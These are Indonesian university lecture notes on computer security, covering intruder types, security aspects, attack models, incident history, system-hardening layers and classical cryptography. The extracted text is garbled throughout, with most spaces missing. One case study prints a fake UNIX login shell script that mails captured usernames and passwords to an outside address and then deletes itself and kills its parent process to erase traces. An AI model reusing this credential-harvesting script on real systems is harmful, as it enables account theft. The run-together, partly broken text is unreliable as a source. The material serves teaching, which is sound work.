KeamananKomputer

DIKTATKULIAHKEAMANANKOMPUTER

PENDAHULUAN

Carabelajar:
Caribukubukumengenaikeamanankomputercetakan,ebook,majalahmajalah/tabloid
komputeredisicetakmaupunedisionline.
Akseskesitussitusreviewkeamanan(contoh:www.cert.org),situssitusunderground
(silahkancariviasearchengine).
Pelajarireviewataumanualbookperangkatkerasdanperangkatlunakuntukmemahami
carakerjadenganbaik.

KeamananKomputerMengapadibutuhkan?

informationbasedsociety,menyebabkannilaiinformasimenjadisangatpentingdan
menuntutkemampuanuntukmengaksesdanmenyediakaninformasisecaracepatdan
akuratmenjadisangatesensialbagisebuahorganisasi,

InfrastrukturJaringankomputer,sepertiLANdanInternet,memungkinkanuntuk
menyediakaninformasisecaracepat,sekaligusmembukapotensiadanyalubang
keamanan(securityhole)

KejahatanKomputersemakinmeningkatkarena:
AplikasibisnisberbasisTIdanjaringankomputermeningkat:onlinebanking,e
commerce,ElectronicdataInterchange(EDI).
Desentralisasiserver.
Transisidarisinglevendorkemultivendor.
Meningkatnyakemampuanpemakai(user).
Kesulitanpenegakhokumdanbelumadanyaketentuanyangpasti.
Semakinkompleksnyasystemyangdigunakan,semakinbesarnyasourcecode
programyangdigunakan.
Berhubungandenganinternet.

Hal:1
KeamananKomputer
KlasifikasikejahatanKomputer:

LevelDangerous Levelannoying

MenurutDavidIcove[JohnD.Howard,AnAnalysisOfSecurityIncidentsOnTheInternet1989
1995,PhDthesis,EngineeringandPublicPolicy,CarnegieMellonUniversity,1997.]
berdasarkanlubangkeamanan,keamanandapat
diklasifikasikanmenjadiempat,yaitu:
1. Keamananyangbersifatfisik(physicalsecurity):termasukaksesorangkegedung,
peralatan,danmediayangdigunakan.Contoh:
Wiretappingatauhalhalyangberhubungandenganakseskekabelatau
komputeryangdigunakanjugadapatdimasukkankedalamkelasini.
Denialofservice,dilakukanmisalnyadenganmematikanperalatanatau
membanjirisalurankomunikasidenganpesanpesan(yangdapatberisiapasaja
karenayangdiutamakanadalahbanyaknyajumlahpesan).
SynFloodAttack,dimanasistem(host)yangditujudibanjiriolehpermintaan
sehinggadiamenjaditerlalusibukdanbahkandapatberakibatmacetnyasistem
(hang).
2. Keamananyangberhubungandenganorang(personel),Contoh:
Identifikasiuser(usernamedanpassword)
Profilresikodariorangyangmempunyaiakses(pemakaidanpengelola).

3. Keamanandaridatadanmediasertateknikkomunikasi(communications).
4. Keamanandalamoperasi:Adanyaproseduryangdigunakanuntukmengaturdan
mengelolasistemkeamanan,danjugatermasukprosedursetelahserangan(post
attackrecovery).

Karakteristik Penyusup :
1. The Curious (Si Ingin Tahu) - tipe penyusup ini pada
dasarnya tertarik menemukan jenis sistem dan data
yang anda miliki.
2. The Malicious (Si Perusak) - tipe penyusup ini
berusaha untuk merusak sistem anda, atau merubah
web page anda, atau sebaliknya membuat waktu dan
uang anda kembali pulih.
3. The High-Profile Intruder (Si Profil Tinggi) - tipe
penyusup ini berusaha menggunakan sistem anda
untuk memperoleh popularitas dan ketenaran. Dia
mungkin menggunakan sistem profil tinggi anda untuk
mengiklankan kemampuannya.
4. The Competition (Si Pesaing) - tipe penyusup ini
tertarik pada data yang anda miliki dalam sistem anda.
Ia mungkin seseorang yang beranggapan bahwa anda
memiliki sesuatu yang dapat menguntungkannya
secara keuangan atau sebaliknya.

Hal:2
KeamananKomputer

Istilah bagi penyusup :

1. Mundane ; tahu mengenai hacking tapi tidak
mengetahui metode dan prosesnya.
2. lamer (script kiddies) ; mencoba script2 yang
pernah di buat oleh aktivis hacking, tapi tidak
paham bagaimana cara membuatnya.
3. wannabe ; paham sedikit metode hacking, dan
sudah mulai berhasil menerobos sehingga
berfalsafah ; HACK IS MY RELIGION.
4. larva (newbie) ; hacker pemula, teknik hacking
mulai dikuasai dengan baik, sering bereksperimen.
5. hacker ; aktivitas hacking sebagai profesi.
6. wizard ; hacker yang membuat komunitas
pembelajaran di antara mereka.
7. guru ; master of the master hacker, lebih
mengarah ke penciptaan tools-tools yang
powerfull yang salah satunya dapat menunjang
aktivitas hacking, namun lebih jadi tools
pemrograman system yang umum.

ASPEKKEAMANANKOMPUTER:
MenurutGarfinkel[SimsonGarfinkel,PGP:PrettyGoodPrivacy,OReilly&Associates,Inc.,
1995.]

1.Privacy/Confidentiality
Defenisi:menjagainformasidariorangyangtidakberhakmengakses.
Privacy:lebihkearahdatadatayangsifatnyaprivat,Contoh:emailseorangpemakai
(user)tidakbolehdibacaolehadministrator.
Confidentiality :berhubungandengandatayangdiberikankepihaklainuntuk
keperluantertentudanhanyadiperbolehkanuntukkeperluantertentutersebut.
Contoh:datadatayangsifatnyapribadi(sepertinama,tempattanggallahir,social
securitynumber,agama,statusperkawinan,penyakityangpernahdiderita,nomorkartu
kredit,dansebagainya)harusdapatdiproteksidalampenggunaandanpenyebarannya.
BentukSerangan:usahapenyadapan(denganprogramsniffer).
Usahausahayangdapatdilakukanuntukmeningkatkanprivacydanconfidentialityadalah
denganmenggunakanteknologikriptografi.

2.Integrity
Defenisi:informasitidakbolehdiubahtanpaseijinpemilikinformasi.
Contoh:emaildiinterceptditengahjalan,diubahisinya,kemudianditeruskankealamat
yangdituju.
Bentukserangan:Adanyavirus,trojanhorse,ataupemakailainyangmengubahinformasi
tanpaijin,maninthemiddleattackdimanaseseorangmenempatkandiriditengah
pembicaraandanmenyamarsebagaioranglain.

3.Authentication
Defenisi:metodauntukmenyatakanbahwainformasibetulbetulasli,atauorangyang
mengaksesataumemberikaninformasiadalahbetulbetulorangyangdimaksud.
Dukungan:
Hal:3
KeamananKomputer
AdanyaToolsmembuktikankeasliandokumen,dapatdilakukandenganteknologi
watermarking(untukmenjagaintellectualproperty,yaitudenganmenandai
dokumenatauhasilkaryadengantandatanganpembuat)dandigitalsignature.
Accesscontrol,yaituberkaitandenganpembatasanorangyangdapatmengakses
informasi.Userharusmenggunakanpassword,biometric(ciricirikhasorang),dan
sejenisnya.

4.Availability
Defenisi:berhubungandenganketersediaaninformasiketikadibutuhkan.
Contohhambatan:
denialofserviceattack(DoSattack),dimanaserverdikirimipermintaan(biasanya
palsu)yangbertubitubiataupermintaanyangdiluarperkiraansehinggatidakdapat
melayanipermintaanlainataubahkansampaidown,hang,crash.
mailbomb,dimanaseorangpemakaidikirimiemailbertubitubi(katakanribuane
mail)denganukuranyangbesarsehinggasangpemakaitidakdapatmembukae
mailnyaataukesulitanmengaksesemailnya.

5.AccessControl
Defenisi:carapengaturanakseskepadainformasi.berhubungandenganmasalah
authenticationdanjugaprivacy
Metode:menggunakankombinasiuserid/passwordataudengan
menggunakanmekanismelain.

6.Nonrepudiation
Defenisi:Aspekinimenjagaagarseseorangtidakdapatmenyangkaltelahmelakukan
sebuahtransaksi.Dukunganbagielectroniccommerce.

SECURITYATTACKMODELS

MenurutW.Stallings[WilliamStallings,NetworkandInternetworkSecurity,Prentice
Hall,1995.]serangan(attack)terdiridari:

Interruption:Perangkatsistemmenjadirusakatautidaktersedia.Seranganditujukan
kepadaketersediaan(availability)darisistem.Contohseranganadalahdenialofservice
attack.

Interception:Pihakyangtidakberwenangberhasilmengaksesassetatauinformasi.
Contohdariseranganiniadalahpenyadapan(wiretapping).

Modification:Pihakyangtidakberwenangtidaksajaberhasilmengakses,akantetapi
dapatjugamengubah(tamper)aset.Contohdariseranganiniantaralainadalahmengubah
isidariwebsitedenganpesanpesanyangmerugikanpemilikwebsite.

Fabrication:Pihakyangtidakberwenangmenyisipkanobjekpalsukedalamsistem.
Contohdariseranganjenisiniadalahmemasukkanpesanpesanpalsusepertiemailpalsu
kedalamjaringankomputer.

SECURITYBREACHACCIDENT

1996 U.S.FederalComputerIncidentResponseCapability(FedCIRC)
melaporkanbahwalebihdari2500insidendisystemkomputeratau
Hal:4
KeamananKomputer
jaringankomputeryangdisebabkanolehgagalnyasistemkeamananatau
adanyausahauntukmembobolsistemkeamanan
1996 FBINationalComputerCrimesSquad,WashingtonD.C.,memperkirakan
kejahatankomputeryangterdeteksikurangdari15%,danhanya10%
dariangkaituyangdilaporkan
1997 PenelitianDeloitteTouchTohmatsumenunjukkanbahwadari300
perusahaandiAustralia,37%(duadiantaralima)pernahmengalami
masalahkeamanansistemkomputernya.
1996 Inggris,NCCInformationSecurityBreachesSurveymenunjukkanbahwa
kejahatankomputermenaik200%daritahun1995ke1996.Kerugian
ratarataUS$30.000/insiden.
1998 FBImelaporkanbahwakasuspersidanganyangberhubungan
dengankejahatankomputermeroket950%daritahun1996ke
tahun1997,denganpenangkapandari4ke42,danterbukti
(convicted)dipengadilannaik88%dari16ke30kasus.
Danlainlain.Dapatdilihatdiwww.cert.org

Contohakibatdarijebolnyasistemkeamanan,antaralain:

1988 KeamanansistemmailsendmaildieksploitasiolehRobert
TapanMorrissehinggamelumpuhkansistemInternet.Kegiatan
inidapatdiklasifikasikansebagaidenialofserviceattack.
Diperkirakanbiayayangdigunakanuntukmemperbaikidanhalhallain
yanghilangadalahsekitar$100juta.Ditahun1990Morris
dihukum(convicted)danhanyadidenda$10.000.
10Maret1997 SeoranghackerdariMassachusettsberhasilmematikansistem
telekomunikasidisebuahairportlocal(Worcester,Massachusetts)
sehinggamematikankomunikasidicontroltowerdanmenghalau
pesawatyanghendakmendarat.
DiajugamengacaukansistemtelepondiRutland,Massachusetts.
http://www.news.com/News/Item/Textonly/0,25,20278,00.html?pfv
1990 KevinPoulsenmengambilalihsystemkomputertelekomunikasidiLos
Angelesuntukmemenangkankuisdisebuahradiolocal.
1995 KevinMitnick,mencuri20.000nomorkartukredit,menyalinsystem
operasiDECsecaraillegaldanmengambilalihhubungantelpondiNew
YorkdanCalifornia.
1995 VladimirLevinmembobolbankbankdikawasanWallstreet,
mengambiluangsebesar$10juta.
2000 FabianClonemenjebolsitusaetna.co.iddanJakartamaildanmembuat
directoryatasnamanyaberisiperingatanterhadapadministratorsitus
tersebut.
2000 BeberapawebsiteIndonesiasudahdijeboldandaftarnya(beserta
contohhalamanyangsudahdijebol)dapatdilihatdikoleksi
<http://www.2600.com>
2000 Wenas,membuatserversebuahISPdisingapuradown

MEMAHAMIHACKERBEKERJA

Secaraumummelaluitahapantahapansebagaiberikut:
1. Tahapmencaritahusystemkomputersasaran.
2. Tahappenyusupan
3. Tahappenjelajahan
4. Tahapkeluardanmenghilangkanjejak.
Hal:5
KeamananKomputer

ContohkasusTrojanHouse,memanfaatkanSHELLscriptUNIX:
SeoranggadiscantikdangenitpesertakuliahUNIXdisebuahperguruantinggimemiliki
potensimemancingpengelolasistemkomputer(administratorpemegangaccountroot...
hmmm)yanglengah.IamelaporkanbahwakomputertempatiamelakukantugastugasUNIX
yangdiberikantidakdapatdipergunakan.Sangpengelolasistemkomputertentusajadengan
gagahperkasainginmenunjukkankekuasaansebagaiadministratorUNIX.
"Well,inisoalkecil.Mungkinpasswordkamukeblokir,biarsayaperbaikidaritempatkamu",
ujaradministratorUNIXsombongsambildudukdisebelahgadiscantikdangenitpesertakuliah
tersebut.
Keesokanharinya,terjadilahkekacauandisistemUNIXkarenadidugaterjadipenyusupanoleh
hackertermasukjugahompepageperguruantinggitersebutdiobokobok,maklum
pengelolanyamasihsama.Selanjutnyapihakperguruantinggimengeluarkanpressrelease
bahwahomepagemerekadijebololehhackerdariLuarNegeri....hihiii
Nahsebenarnyaapasihyangterjadi?
Sederhana,gadiscantikdangenitpesertakuliahUNIXtersebutmenggunakanprogramkecil
my_logindalambentukshellscriptyangmenyerupailayarlogindanpasswordsistemUNIX
sebagaiberikut:
#!/bin/sh
###################################
#Namaprogram:my_login
#Deskripsi:Programkuda jansederhana tro
#versi1.0Nopember1999
####################################
COUNTER=0
Cat/etc/issue
While["$COUNTER"ne2]
do
letCOUNTER=$COIUNTER+1
echo"login: c" \
readLOGIN
sttyecho
echo"password:\c"
readPASSWORD
echo"Us $LOGIN:$PASSWORD"|mailgadis@company.com er
stty ho ec
echo
echo"LoginIncorrect"
done
rm$0
kill9$PPID

Apabilaprograminidijalankanmakaakanditampilkanlayarloginsepertilayaknyaawal
penggunaankomputerpdaasistemUNIX:

Login:
Password:

Lihatlah,AdministratorUNIXyanggagahperkasatadiyangtidakmelihatgadistersebut
menjalankanprograminitentunyatidaksadarbahwainimerupakanlayartipuan.Layarlogin
initidakterlihatbedadibandinglayarloginsesungguhnya.
Sepertipadaprogramloginsesungguhnya,sistemkomputerakanmemintapemakaiuntuk
loginkedalamsistem.Setelahdiisipassworddandienter,makasegeratimbulpesan

Hal:6
KeamananKomputer
Login:root
Password:********
LoginIncorrect

TentusajaAdministratorUNIXakankagetbahwapasswordnyaternyata(seolaholah)salah.
Untukituiasegeramengulangilogindanpassword.Setelahduakaliiamencobalogindan
tidakberhasil,makaloginnyadibatalkandankembalikeluarUNIX.
Perhatikanprogramdiatasbaikbaik,sekalipemakaitersebutmencobalogindanmengisi
passwordpadalayardiatas,setelahitumakaotomatisdatalogindanpasswordtersebutakan
diemailkemailto:hacker@company.com.Sampaidisinimakasigadislugudangenittelah
mendapatkanlogindanpassword...iaternyataseoranghacker!!
Walaupunsederhana,jikakitaperhatikanlebihjauhlagi,makaprograminijugamemiliki
beberapatrikhackerlainnya,yaituprosespenghilanganjejak(masihingattahapanhacker
yangditulisdiatas?).Prosesinidilakukanpada2baristerakhirdariprogrammy_logindiatas,
yaitu

rm$0
kill9$PPID

yangartinyaakansegeradilakukanprosespenghapusanprogrammy_logindanhapuspulaID
dariproses.Dengandemikianhilanglahprogramtersebutyangtentunyajugamenhilangkan
barangbukti.DitambahlagipenghapusanterhadapjejakprosesdidalamsistemUNIX.Zap...
hilangsudahtandatandabahwahackernyaternyataseoranggadispesertakuliahnya.

Suksesdariprograminisebenarnyasangattergantungdaribagaimanaagaraplikasiinidapat
dieksekusiolehroot.Hackeryangbaikmemangharusberusahamemancingagarpemilikroot
menjalankanprogramini.

PRINSIPDASARPERANCANGANSISTEMYANGAMAN

1. Mencegahhilangnyadata
2. Mencegahmasuknyapenyusup

LAPISANKEAMANAN:

1.LapisanFisik:
membatasiaksesfisikkemesin:
o Aksesmasukkeruangankomputer
o pengunciankomputersecarahardware
o keamananBIOS
o keamananBootloader
backupdata:
o pemilihanpirantibackup
o penjadwalanbackup
mendeteksigangguanfisik:
logfile:Logpendekatautidaklengkap,Logyangberisikanwaktuyanganeh,Log
denganpermisiataukepemilikanyangtidaktepat,Catatanpelayananrebootatau
restart,Logyanghilang,masukansuataulogindaritempatyangjanggal
mengontrolaksessumberdaya.

2.Keamananlokal
Berkaitandenganuserdanhakhaknya:
Hal:7
KeamananKomputer
Berimerekafasilitasminimalyangdiperlukan.
Hatihatiterhadapsaat/darimanamerekalogin,atautempatseharusnyamereka
login.
Pastikandanhapusrekeningmerekaketikamerekatidaklagimembutuhkanakses.

3.KeamananRoot
Ketikamelakukanperintahyangkompleks,cobalahdalamcarayangtidakmerusak
dulu,terutamaperintahyangmenggunakanglobbing:contoh,andainginmelakukan
"rmfoo*.bak",pertamacobadulu:"lsfoo*.bak"danpastikanandainginmenghapus
filefileyangandapikirkan.
Beberapaorangmerasaterbantuketikamelakukan"touch/i"padasistemmereka.
Haliniakanmembuatperintahperintahseperti:"rmfr*"menanyakanapakahanda
benarbenaringinmenghapusseluruhfile.(Shellandamenguraikan"i"dulu,dan
memberlakukannyasebagaioptionikerm).
Hanyamenjadirootketikamelakukantugastunggaltertentu.Jikaandaberusaha
mengetahuibagaimanamelakukansesuatu,kembalikeshellpemakainormalhingga
andayakinapayangperludilakukanolehroot.
Jalurperintahuntukpemakairootsangatpenting.Jalurperintah,atauvariabel
lingkunganPATHmendefinisikanlokalyangdicarishelluntukprogram.Cobalahdan
batasijalurperintahbagipemakairootsedapatmungkin,danjanganpernah
menggunakan'.',yangberarti'direktorisaatini',dalampernyataanPATHanda.
Sebagaitambahan,janganpernahmenaruhdirektoriyangdapatditulispadajalur
pencariananda,karenahalinimemungkinkanpenyerangmemodifikasiataumenaruh
filebinerdalamjalurpencariananda,yangmemungkinkanmerekamenjadirootketika
andamenjalankanperintahtersebut.
Janganpernahmenggunakanseperangkatutilitasrlogin/rsh/rexec(disebututilitasr)
sebagairoot.Merekamenjadisasaranbanyakserangan,dansangatberbahayabila
dijalankansebagairoot.Janganmembuatfile.rhostsuntukroot.
File/etc/securettyberisikandaftarterminalterminaltempatrootdapatlogin.Secara
baku(padaRedHatLinux)disethanyapadakonsolvirtuallokal(vty).Berhatihatilah
saatmenambahkanyanglainkefileini.Andaseharusnyalogindarijarakjauhsebagai
pemakaibiasadankemudian'su'jikaandabutuh(mudahmudahanmelaluisshatau
saluranterenkripsilain),sehinggatidakperluuntukloginsecaralangsungsebagairoot.
Selaluperlahandanberhatihatiketikamenjadiroot.Tindakanandadapat
mempengaruhibanyakhal.Pikirsebelumandamengetik!

4.KeamananFiledansystemfile
Directoryhomeusertidakbolehmengaksesperintahmengubahsystemsepertipartisi,
perubahandevicedanlainlain.
Lakukansettinglimitsystemfile.
Aturaksesdanpermissionfile:read,writa,executebagiusermaupungroup.
Selalucekprogramprogramyangtidakdikenal

5.KeamananPassworddanEnkripsi
Hatihatiterhadapbrutoforceattackdenganmembuatpasswordyangbaik.
Selalumengenkripsifileyangdipertukarkan.
Lakukanpengamananpadaleveltampilan,sepertiscreensaver.

6.KeamananKernel
selaluupdatekernelsystemoperasi.
Ikutireviewbugsdankekurangkekuranganpadasystemoperasi.

7.KeamananJaringan
WaspadaipaketsnifferyangseringmenyadapportEthernet.
Hal:8
KeamananKomputer
Lakukanproseduruntukmengecekintegritasdata
VerifikasiinformasiDNS
Lindunginetworkfilesystem
Gunakanfirewalluntukbarrierantarajaringanprivatdenganjaringaneksternal

KRIPTOGRAFI

DEFENISI
Cryptographyadalahsuatuilmuataupunsenimengamankanpesan,dandilakukanolehcryptographer.
Cryptanalysisadalahsuatuilmudansenimembuka(breaking)ciphertextdanorangyangmelakukannya
disebutcryptanalyst.

ELEMEN

CRYPTOSYSTEM

Cryptographicsystemataucryptosystemadalahsuatufasilitasuntukmengkonversikanplaintextke
ciphertextdansebaliknya.Dalamsistemini,seperangkatparameteryangmenentukantransformasi
pencipherantertentudisebutsuatusetkunci.Prosesenkripsidandekripsidiaturolehsatuatau
beberapakuncikriptografi.

1.Kriptografidapatmemenuhikebutuhanumumsuatutransaksi:

1. Kerahasiaan(confidentiality)dijamindenganmelakukanenkripsi(penyandian).
2. Keutuhan(integrity)atasdatadatapembayarandilakukandenganfungsihash
satuarah.
3. Jaminanatasidentitasdankeabsahan(authenticity)pihakpihakyang
melakukantransaksidilakukandenganmenggunakanpasswordatausertifikat
digital.Sedangkankeotentikandatatransaksidapatdilakukandengantanda
tangandigital.
4. Transaksidapatdijadikanbarangbuktiyangtidakbisadisangkal(non
repudiation)denganmemanfaatkantandatangandigitaldansertifikatdigital.

2.Karakteristikcryptosytemyangbaiksebagaiberikut:

1. Keamanansistemterletakpadakerahasiaankuncidanbukanpadakerahasiaan
algoritmayangdigunakan.
2. Cryptosystemyangbaikmemilikiruangkunci(keyspace)yangbesar.
3. Cryptosystemyangbaikakanmenghasilkanciphertextyangterlihatacakdalam
seluruhtesstatistikyangdilakukanterhadapnya.
4. Cryptosystemyangbaikmampumenahanseluruhseranganyangtelahdikenal
sebelumnya

Hal:9
KeamananKomputer
3.MACAMCRYPTOSYSTEM

A.SymmetricCryptosystem
Dalamsymmetriccryptosystemini,kunciyangdigunakanuntukprosesenkripsidandekripsi
padaprinsipnyaidentik,tetapisatubuahkuncidapatpuladiturunkandarikunciyanglainnya.
Kuncikunciiniharusdirahasiakan.Olehkarenaitulahsisteminiseringdisebutsebagaisecret
keyciphersystem.Jumlahkunciyangdibutuhkanumumnyaadalah:

n
C
2
=n.(n1)

2
dengannmenyatakanbanyaknyapengguna.
ContohdarisisteminiadalahDataEncryptionStandard(DES),Blowfish,IDEA.

B.AssymmetricCryptosystem
Dalamassymmetriccryptosysteminidigunakanduabuahkunci.Satukunciyangdisebutkunci
publik(publickey)dapatdipublikasikan,sedangkunciyanglainyangdisebutkunciprivat
(privatekey)harusdirahasiakan.Prosesmenggunakansisteminidapatditerangkansecara
sederhanasebagaiberikut:bilaAinginmengirimkanpesankepadaB,Adapatmenyandikan
pesannyadenganmenggunakankuncipublikB,danbilaBinginmembacasurattersebut,ia
perlumendekripsikansuratitudengankunciprivatnya.Dengandemikiankeduabelahpihak
dapatmenjaminasalsuratsertakeasliansurattersebut,karenaadanyamekanismeini.Contoh
sisteminiantaralainRSASchemedanMerkleHellmanScheme.

4.PROTOKOLCRYPTOSYSTEM

Cryptographicprotocoladalahsuatuprotokolyangmenggunakankriptografi.Protokolinimelibatkan
sejumlahalgoritmakriptografi,namunsecaraumumtujuanprotokollebihdarisekedarkerahasiaan.
Pihakpihakyangberpartisipasimungkinsajainginmembagisebagianrahasianyauntukmenghitung
sebuahnilai,menghasilkanurutanrandom,ataupunmenandatanganikontraksecarabersamaan.

Penggunaankriptografidalamsebuahprotokolterutamaditujukanuntukmencegahataupun
mendeteksiadanyaeavesdroppingdancheating.

5.JENISPENYERANGANPADAPROTOKOL

Ciphertextonlyattack.Dalampenyeranganini,seorangcryptanalystmemiliki
ciphertextdarisejumlahpesanyangseluruhnyatelahdienkripsimenggunakan
algoritmayangsama.
Knownplaintextattack.Dalamtipepenyeranganini,cryptanalystmemilikiaksestidak
hanyakeciphertextsejumlahpesan,namuniajugamemilikiplaintextpesanpesan
tersebut.
Chosenplaintextattack.Padapenyeranganini,cryptanalysttidakhanyamemiliki
aksesatasciphertextdanplaintextuntukbeberapapesan,tetapiiajugadapatmemilih
plaintextyangdienkripsi.
Adaptivechosenplaintextattack.Penyerangantipeinimerupakansuatukasuskhusus
chosenplaintextattack.Cryptanalysttidakhanyadapatmemilihplaintextyang
dienkripsi,iapunmemilikikemampuanuntukmemodifikasipilihanberdasarkanhasil
enkripsisebelumnya.Dalamchosenplaintextattack,cryptanalystmungkinhanya
dapatmemilikiplaintextdalamsuatublokbesaruntukdienkripsi;dalamadaptive
chosenplaintextattackiniiadapatmemilihblokplaintextyanglebihkecildan
Hal:10
KeamananKomputer
kemudianmemilihyanglainberdasarkanhasilyangpertama,prosesinidapat
dilakukannyaterusmenerushinggaiadapatmemperolehseluruhinformasi.
Chosenciphertextattack.Padatipeini,cryptanalystdapatmemilihciphertextyang
berbedauntukdidekripsidanmemilikiaksesatasplaintextyangdidekripsi.
Chosenkeyattack.Cryptanalystpadatipepenyeranganinimemilikipengetahuan
tentanghubunganantarakuncikunciyangberbeda.
Rubberhosecryptanalysis.Padatipepenyeranganini,cryptanalystmengancam,
memeras,ataubahkanmemaksaseseoranghinggamerekamemberikankuncinya.

6.JENISPENYERANGANPADAJALURKOMUNIKASI

Sniffing:secaraharafiahberartimengendus,tentunyadalamhaliniyangdiendus
adalahpesan(baikyangbelumataupunsudahdienkripsi)dalamsuatusaluran
komunikasi.Haliniumumterjadipadasaluranpublikyangtidakaman.Sang
pengendusdapatmerekampembicaraanyangterjadi.
Replayattack[DHMM96]:Jikaseseorangbisamerekampesanpesanhandshake
(persiapankomunikasi),iamungkindapatmengulangpesanpesanyangtelah
direkamnyauntukmenipusalahsatupihak.
Spoofing[DHMM96]:PenyerangmisalnyaMamanbisamenyamarmenjadiAnto.
SemuaorangdibuatpercayabahwaMamanadalahAnto.Penyerangberusaha
meyakinkanpihakpihaklainbahwatakadasalahdengankomunikasiyangdilakukan,
padahalkomunikasiitudilakukandengansangpenipu/penyerang.Contohnyajika
orangmemasukkanPINkedalammesinATMpalsuyangbenarbenardibuatseperti
ATMaslitentusangpenipubisamendapatkanPINnyadancopypitamagentikkartu
ATMmiliksangnasabah.Pihakbanktidaktahubahwatelahterjadikejahatan.
Maninthemiddle[Schn96]:Jikaspoofingterkadanghanyamenipusatupihak,maka
dalamskenarioini,saatAntohendakberkomunikasidenganBadu,Mamandimata
AntoseolaholahadalahBadu,danMamandapatpulamenipuBadusehinggaMaman
seolaholahadalahAnto.Mamandapatberkuasapenuhatasjalurkomunikasini,dan
bisamembuatberitafitnah.

METODECRYPTOGRAFI

1.METODEKUNO

a.475S.M.bangsaSparta,suatubangsamiliterpadajamanYunanikuno,menggunakanteknik
kriptografiyangdisebutscytale,untukkepentinganperang.Scytaleterbuatdaritongkat
denganpapyrusyangmengelilinginyasecaraspiral.
Kuncidariscytaleadalahdiametertongkatyangdigunakanolehpengirimharussamadengan
diametertongkatyangdimilikiolehpenerimapesan,sehinggapesanyangdisembunyikan
dalampapyrusdapatdibacadandimengertiolehpenerima.

Hal:11
KeamananKomputer

b.JuliusCaesar,seorangkaisarterkenalRomawiyangmenaklukkanbanyakbangsadiEropa
danTimurTengahjugamenggunakansuatuteknikkriptografiyangsekarangdisebutCaesar
cipheruntukberkorespondensisekitartahun60S.M.TeknikyangdigunakanolehSangCaesar
adalahmensubstitusikanalfabetsecaraberaturan,yaituolehalfabetketigayang
mengikutinya,misalnya,alfabetA"digantikanoleh"D","B"oleh"E",danseterusnya.Sebagai
contoh,suatupesanberikut:

Gambar2.CaesarCipher

DenganaturanyangdibuatolehJuliusCaesartersebut,pesansebenarnyaadalah"Penjarakan
panglimadivisiketujuhsegera".

2.TEKNIKDASARKRIPTOGRAFI

a.Substitusi

SalahsatucontohteknikiniadalahCaesarcipheryangtelahdicontohkandiatas.Langkah
pertamaadalahmembuatsuatutabelsubstitusi.Tabelsubstitusidapatdibuatsesukahati,
dengancatatanbahwapenerimapesanmemilikitabelyangsamauntukkeperluandekripsi.
Bilatabelsubstitusidibuatsecaraacak,akansemakinsulitpemecahanciphertextolehorang
yangtidakberhak.

ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890.,
BF1KQGATPJ6HYD2X5MV7C84I9NREU3LSW,.OZ0

Gambar3.TabelSubstitusi

Tabelsubstitusidiatasdibuatsecaraacak.Denganmenggunakantabeltersebut,dariplaintext
"5teknikdasarkriptografi"dihasilkanciphertext"L7Q6DP6KBVBM6MPX72AMBGP".Dengan
menggunakantabelsubstitusiyangsamasecaradenganarahyangterbalik(reverse),plaintext
dapatdiperolehkembalidariciphertextnya.

Hal:12
KeamananKomputer
b.Blocking

Sistemenkripsiterkadangmembagiplaintextmenjadiblokblokyangterdiridaribeberapa
karakteryangkemudiandienkripsikansecaraindependen.Plaintextyangdienkripsikandengan
menggunakanteknikblockingadalah:

BLOK 1
BLOK 2
BLOK 3
BLOK 4
BLOK 5
BLOK 6
BLOK 7

Gambar4.EnkripsidenganBlocking

Denganmenggunakanenkripsiblockingdipilihjumlahlajurdankolomuntukpenulisanpesan.
Jumlahlajurataukolommenjadikuncibagikriptografidenganteknikini.Plaintextdituliskan
secaravertikalkebawahberurutanpadalajur,dandilanjutkanpadakolomberikutnyasampai
seluruhnyatertulis.Ciphertextnyaadalahhasilpembacaanplaintextsecarahorizontal
berurutansesuaidenganbloknya.Jadiciphertextyangdihasilkandenganteknikiniadalah"5K
GKRTDRAEAIFKSPINATIRO".Plaintextdapatpuladitulissecarahorizontaldanciphertextnya
adalahhasilpembacaansecaravertikal.

c.Permutasi

Salahsatuteknikenkripsiyangterpentingadalahpermutasiatauseringjugadisebut
transposisi.Teknikinimemindahkanataumerotasikankarakterdenganaturantertentu.
Prinsipnyaadalahberlawanandengantekniksubstitusi.Dalamtekniksubstitusi,karakter
beradapadaposisiyangtetaptapiidentitasnyayangdiacak.Padateknikpermutasi,identitas
karakternyatetap,namunposisinyayangdiacak.Sebelumdilakukanpermutasi,umumnya
plaintextterlebihdahuludibagimenjadiblokblokdenganpanjangyangsama.
Untukcontohdiatas,plaintextakandibagimenjadiblokblokyangterdiridari6karakter,
denganaturanpermutasisebagaiberikut:

Gambar5.Permutasi

Denganmenggunakanaturandiatas,makaprosesenkripsidenganpermutasidariplaintext
adalahsebagaiberikut:
Hal:13
KeamananKomputer

Gambar6.ProsesEnkripsidenganPermutasi

Ciphertextyangdihasilkandenganteknikpermutasiiniadalah"NETK5SKDAIIRKRAATGORP
FI".

d.Ekspansi

Suatumetodesederhanauntukmengacakpesanadalahdenganmemelarkanpesanitudengan
aturantertentu.Salahsatucontohpenggunaanteknikiniadalahdenganmeletakkanhuruf
konsonanataubilanganganjilyangmenjadiawaldarisuatukatadiakhirkataitudan
menambahkanakhiran"an".Bilasuatukatadimulaidenganhurufvokalataubilangangenap,
ditambahkanakhiran"i".Prosesenkripsidengancaraekspansiterhadapplaintextterjadi
sebagaiberikut:

Gambar7.EnkripsidenganEkspansi

Ciphertextnyaadalah"5ANEKNIKTANASARDANRIPTOGRAFIKAN".Aturanekspansidapat
dibuatlebihkompleks.Terkadangteknikekspansidigabungkandengantekniklainnya,karena
teknikinibilaberdirisendiriterlalumudahuntukdipecahkan.

e.Pemampatan(Compaction)

Mengurangipanjangpesanataujumlahbloknyaadalahcaralainuntukmenyembunyikanisi
pesan.Contohsederhanainimenggunakancaramenghilangkansetiapkarakterketigasecara
berurutan.Karakterkarakteryangdihilangkandisatukankembalidandisusulkansebagai
"lampiran"daripesanutama,dengandiawaliolehsuatukarakterkhusus,dalamcontohini
digunakan"&".Prosesyangterjadiuntukplaintextkitaadalah:
Hal:14
KeamananKomputer

Gambar8.EnkripsidenganPemampatan

Aturanpenghilangankarakterdankarakterkhususyangberfungsisebagaipemisahmenjadi
dasaruntukprosesdekripsiciphertextmenjadiplaintextkembali.

Denganmenggunakankelimateknikdasarkriptografidiatas,dapatdiciptakankombinasi
teknikkriptografiyangamatbanyak,denganfaktoryangmembatasisematamatahanyalah
kreativitasdanimajinasikita.Walaupunsekilasterlihatsederhana,kombinasiteknikdasar
kriptografidapatmenghasilkanteknikkriptografiturunanyangcukupkompleks,danbeberapa
teknikdasarkriptografimasihdigunakandalamteknikkriptografimodern.

BERBAGAISOLUSIENKRIPSIMODERN
